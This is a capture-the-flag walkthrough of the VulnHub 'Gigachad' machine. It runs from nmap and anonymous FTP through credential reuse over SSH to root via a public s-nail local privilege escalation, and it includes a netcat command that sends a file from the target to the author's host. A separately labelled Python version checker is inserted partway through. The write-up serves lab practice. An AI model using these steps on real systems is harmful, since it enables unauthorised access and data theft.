CTF-gigachad
Discovery
link: vulnhub-GIGACHAD
The only information we have is that there are multiple flags.
Discovery and Scanning
netdiscover
Fast scan with netdiscover.
sudo netdiscover -r 192.168.0.0/16
nmap
sudo nmap -sV -p- 192.168.0.19
Nmap scan report for 192.168.0.19
We have ports 21, 22 and 80 open, and it's a Debian machine.
port 80
Let's go to http://192.168.0.19 and see what I can find.
With the inspector (F12) I found a key: A7F9B77C16A3AA80DAA4E378659226F628326A95 D82D10564866FD9B201941BCC6C94022196F8EE8
Dirbuster
I ran DirBuster with a common wordlist: dirbuster -u http://192.168.0.19/ -l Wordlist-common.txt
Oh… I found 500 directories. I stopped the scan, it's useless.
Hash
They are SHA-1 hashes:
a7f9b77c16a3aa80daa4e378659226f628326a95 = fuck you
D82D10564866FD9B201941BCC6C94022196F8EE8 = VIRGIN
Maybe it's a password or a user.
I have everything I need, so I can move on to the FTP part.
port 21
ftp 192.168.0.19
bash: ftp : commande introuvable
Oh, I use Arch BTW (and I'm French): sudo pacman -S inetutils
Now we can play: ftp 192.168.0.19
user: anonymous
password: password
230 Login successful.
I'm in, let's see what we can get with ls.
-r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfo
Good, I have to read it.
Download: ftp> get chadinfo
Read: cat chadinfo
PK
User: chad
Password: in the image drippinchad.png
http://192.168.0.19/drippinchad.png

I will use Google Images to find out where it is.
It's Maiden's Tower; that should be the password.
After multiple attempts, the password is maidenstower.
I’m connected as chad:
we have the directory ftp with chadinfo,
and also user.txt.
I download and read it.
flag 1/2
Nice, I think I'm done with the FTP. I'll go to sleep and continue tomorrow.
Port 22
I’m back.
I will try to connect to ssh with previous creds:
User: chad
Password: maidenstower
ssh chad@192.168.0.19
I'm in!
I am in his home directory, I will list what's in it:
ls -la
drwxr-xr-x 4 chad chad 4096 Jul 16 06:51 .
.gnupg seems interesting.
I have the directory private-keys-v1.d, but it's empty.
Vulnerability Assessment
Find perms
Hausec pentest-cheatsheet
Find binaries that execute as their owner (SUID): find / -perm -u=s -type f 2>/dev/null
This is what I found:
/usr/lib/openssh/ssh-keysign
s-nail looks interesting: s-nail -V reports v14.8.6
Exploit
I found this on exploit database:
S-nail < 14.8.16 - Local Privilege Escalation
Does 14.8.6 mean 14.8.60 or 14.8.06?
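To settle that question, here is an added Python check (not from the writeup, nor from s-nail) that compares the version printed by s-nail -V with the upper bound in the Exploit-DB title component by component; it assumes the advisory range is a plain "older than the fixed release" test.

```python
import re

# Values taken from the writeup: `s-nail -V` printed "v14.8.6" and the
# Exploit-DB entry is titled "S-nail < 14.8.16 - Local Privilege Escalation".
INSTALLED = "v14.8.6"
FIXED_IN = "14.8.16"


def parse_version(text):
    """Turn a dotted version string into a tuple of integers.

    A leading 'v' and anything after the numeric part are dropped, so
    'v14.8.6' -> (14, 8, 6). Each component is an integer in its own right,
    not a decimal fraction: 6 < 16, so 14.8.6 is older than 14.8.16 and is
    neither 14.8.60 nor 14.8.06.
    """
    match = re.match(r"v?(\d+(?:\.\d+)*)", text.strip())
    if not match:
        raise ValueError(f"not a version string: {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def is_affected(installed, fixed_in):
    """True when `installed` is older than the release that fixed the bug."""
    a, b = parse_version(installed), parse_version(fixed_in)
    # Pad the shorter tuple with zeros so "14.8" compares like "14.8.0".
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


if __name__ == "__main__":
    verdict = "affected" if is_affected(INSTALLED, FIXED_IN) else "not affected"
    print(f"s-nail {INSTALLED} against fix in {FIXED_IN}: {verdict}")
```

A version match only says the advisory may apply: distributions sometimes backport a fix without changing the version string, which is one reason an exploit can report "Not vulnerable" on a build whose number falls inside the range.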
Let’s try it.
touch exploit.sh
vi exploit.sh
Paste this: https://www.exploit-db.com/raw/47172
Escape, :wq.
chmod +x exploit.sh
./exploit.sh
Result:
[-] Failed. Not vulnerable?
This is the only exploit on Exploit Database, what did I do wrong?
I'm trying to download the file onto the chad machine, but the terminal is so buggy.
I will use scp to give it the file: scp 47172.sh chad@192.168.0.19:/tmp/exploit.sh
Type the password: maidenstower
I have to run it with bash because ./ doesn't work, and I have too many errors now.
I think the machine is broken, or maybe my shell;
I have some errors and it's my first CTF with this machine.
I fixed it with this here.
So let's run the script and fail again; I spammed it and I'm in!
I will change my shell to /bin/bash.
I'm root, so let's see what is in the /root/ directory.
# cat root.txt
Nice, the CTF is over, it was easy.
There is an image, I will download it:
Receiver machine: nc -l -p 1234 > chad.png
Sender machine: nc -w 3 192.168.0.16 1234 < chad.png (-w takes a timeout in seconds, and the port must match the listener's 1234)
This is the end, I hope you liked it, it was my first writeup.